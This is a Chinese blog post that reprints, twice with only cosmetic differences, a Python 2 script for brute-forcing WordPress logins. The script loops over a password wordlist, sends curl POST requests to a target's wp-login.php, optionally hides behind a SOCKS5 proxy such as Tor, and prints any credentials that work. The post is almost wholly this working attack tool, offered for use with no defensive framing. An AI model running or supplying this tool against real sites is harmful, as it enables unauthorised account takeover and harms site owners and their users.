最新消息:

python的wordpress暴力破解源码version1和2

Python admin 1626浏览 0评论

version1的代码如下:

# WordPress Login Brute Forcer (without WPscan)
# Sending Curl requests we can found the login password..if the login failed Curl generates the output else any output is generated
# Author: D35m0nd142
#!/usr/bin/python

import os,sys,time,urllib2
from termcolor import colored
os.system("rm wpbrute_output.html")
os.system("rm dir_list.txt")
os.system("clear")

try:
	target = sys.argv[1]
	username = sys.argv[2]
	wlist = sys.argv[3]

except:
	time.sleep(0.6)
	print colored("\nWordpress Login Brute Forcer","green")
	print colored("By:","green"),"D35m0nd142\n"
	time.sleep(1)
	print "Usage: python wpbrute.py <target> <username> <wordlist> <proxy>\n"
	print "Example1: python wpbrute.py http://www.mywebsite.com/ admin wordlist.txt"
	print "Example2: python wpbrute.py http://www.mywebsite.com/ admin wordlist.txt '127.0.0.1:9050'\n"
	sys.exit(1)	

try:
	proxy = sys.argv[4]
except:
	proxy = "no"

if "http://" not in target:
	target = "http://%s" %target

print colored("\nWordpress Login Brute Forcer","green")
print colored("By:","green"),"D35m0nd142"
time.sleep(1)
print "\n ... Calculating number of words in '%s' ... " %wlist
time.sleep(1.3)

words = open(sys.argv[3],"r").readlines()

time.sleep(0.8)

print colored("\n[+] Loaded ","green"), len(words),colored(" passwords from ","green"),"%s" %wlist, colored(" for testing....","green")  
time.sleep(1.3)

if proxy != "no":
	print colored("[+] Loaded proxy => ","green"),"%s" %proxy

else:
	print "\n"

time.sleep(1.1)
print "\n ... Bruteforcing WordPress login ... \n"
time.sleep(1.5)

for word in words:
        word = word.replace('\r','').replace('\n','')

	print colored(".. Attempting =>","yellow")," '%s:%s' " %(username,word) 

	if proxy != "no":
		curl = "curl -s --socks5 %s --url '%s/wp-login.php' -A 'Mozilla/5.0 (Windows NT 5.1; rv:13.0) Gecko/20100101 Firefox/13.0.1' --data 'log=%s&pwd=%s&wp-submit=Login&redirect_to=%s/wp-admin/&testcookie=1' -o wpbrute_output.html" %(proxy,target,username,word,target)

	else:
		curl = "curl -s --url '%s/wp-login.php' -A 'Mozilla/2.0 (compatible; MSIE 6.0; Windows NT 5.2)' --data 'log=%s&pwd=%s&wp-submit=Login&redirect_to=%s/wp-admin/&testcookie=1' -o wpbrute_output.html" %(target,username,word,target)

	ls = "ls -l > dir_list.txt"

	os.system(curl)
	os.system(ls)

	cfile = open("dir_list.txt","r")
	cfile_read = cfile.read()
	cfile.close()

	if "wpbrute_output.html" in cfile_read:
		#print "\n_________________________________________"
		#print ".. Login not bruteforced 🙁 "
		ofile = open("wpbrute_output.html","r")
		ofile_read = ofile.read()
		ofile.close()
		os.system("rm wpbrute_output.html")

		if "Invalid username" in ofile_read or ("Nome de usu" in ofile_read and "inv" in ofile_read and "lido." in ofile_read) or "Nome utente non valido" in ofile_read:
			print colored(".. Invalid username!\n","blue")
			sys.exit(1)
			#print "________________________________________\n"

	else:
		print colored("\n[+] - Successfully Authentication!","red")
		print colored("Host:","green"),"%s" %target
		print colored("User:","green"),"%s" %username
		print colored("Pass:","green"),"%s" %word
		sys.exit(1)

版本2的代码如下:

	

    # WordPress Login Brute Forcer (without WPscan)
    # Sending Curl requests we can found the login password..if the login failed Curl generates the output else any output is generated 
    # Author: D35m0nd142
    #!/usr/bin/python
     
    import os,sys,time,urllib2
    from termcolor import colored
    os.system("rm wpbrute_output.html")
    os.system("rm dir_list.txt")
    os.system("clear")
     
    try:
            target = sys.argv[1]
            username = sys.argv[2]
            wlist = sys.argv[3]
     
    except:
            time.sleep(0.6)
            print colored("\nWordpress Login Brute Forcer","green")
            print colored("By:","green"),"D35m0nd142\n"
            time.sleep(1)
            print "Usage: python wpbrute.py <target> <username> <wordlist> <proxy>\n"
            print "Example1: python wpbrute.py http://www.mywebsite.com/ admin wordlist.txt"
            print "Example2: python wpbrute.py http://www.mywebsite.com/ admin wordlist.txt '127.0.0.1:9050'\n"
            sys.exit(1)    
     
    try:
            proxy = sys.argv[4]
    except:
            proxy = "no"
     
    if "http://" not in target:
            target = "http://%s" %target
     
    print colored("\nWordpress Login Brute Forcer","green")
    print colored("By:","green"),"D35m0nd142"
    time.sleep(1)
    print "\n ... Calculating number of words in '%s' ... " %wlist
    time.sleep(1.3)
     
    words = open(sys.argv[3],"r").readlines()
     
    time.sleep(0.8)
     
    print colored("\n[+] Loaded ","green"), len(words),colored(" passwords from ","green"),"%s" %wlist, colored(" for testing....","green")  
    time.sleep(1.3)
     
    if proxy != "no":
            print colored("[+] Loaded proxy => ","green"),"%s" %proxy
     
    else:
            print "\n"
     
    time.sleep(1.1)
    print "\n ... Bruteforcing WordPress login ... \n"
    time.sleep(1.5)
     
     
    for word in words:
            word = word.replace('\r','').replace('\n','')
     
           
            print colored(".. Attempting =>","yellow")," '%s:%s' " %(username,word)
     
            if proxy != "no":
                    curl = "curl -s --socks5 %s --url '%s/wp-login.php' -A 'Mozilla/5.0 (Windows NT 5.1; rv:13.0) Gecko/20100101 Firefox/13.0.1' --data 'log=%s&pwd=%s&wp-submit=Login&redirect_to=%s/wp-admin/&testcookie=1' -o wpbrute_output.html" %(proxy,target,username,word,target)
           
            else:
                    curl = "curl -s --url '%s/wp-login.php' -A 'Mozilla/2.0 (compatible; MSIE 6.0; Windows NT 5.2)' --data 'log=%s&pwd=%s&wp-submit=Login&redirect_to=%s/wp-admin/&testcookie=1' -o wpbrute_output.html" %(target,username,word,target)
     
            ls = "ls -l > dir_list.txt"
     
            os.system(curl)
            os.system(ls)
     
            cfile = open("dir_list.txt","r")
            cfile_read = cfile.read()
            cfile.close()
     
            if "wpbrute_output.html" in cfile_read:
                    #print "\n_________________________________________"
                    #print ".. Login not bruteforced 🙁 "
                    ofile = open("wpbrute_output.html","r")
                    ofile_read = ofile.read()
                    ofile.close()
                    os.system("rm wpbrute_output.html")
     
                    if "Invalid username" in ofile_read or ("Nome de usu" in ofile_read and "inv" in ofile_read and "lido." in ofile_read) or "Nome utente non valido" in ofile_read:
                            print colored(".. Invalid username!\n","blue")
                            sys.exit(1)
                            #print "________________________________________\n"
     
            else:
                    print colored("\n[+] - Successfully Authentication!","red")
                    print colored("Host:","green"),"%s" %target
                    print colored("User:","green"),"%s" %username
                    print colored("Pass:","green"),"%s" %word
                    sys.exit(1)

 

转载请注明:jinglingshu的博客 » python的wordpress暴力破解源码version1和2


Warning: Use of undefined constant PRC - assumed 'PRC' (this will throw an Error in a future version of PHP) in /usr/share/nginx/html/wp-content/themes/d8/comments.php on line 17
发表我的评论
取消评论

表情

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址

网友最新评论 (1)

  1. 转自http://pastebin.com/f4CaEVRa
    admin8年前 (2013-08-31)回复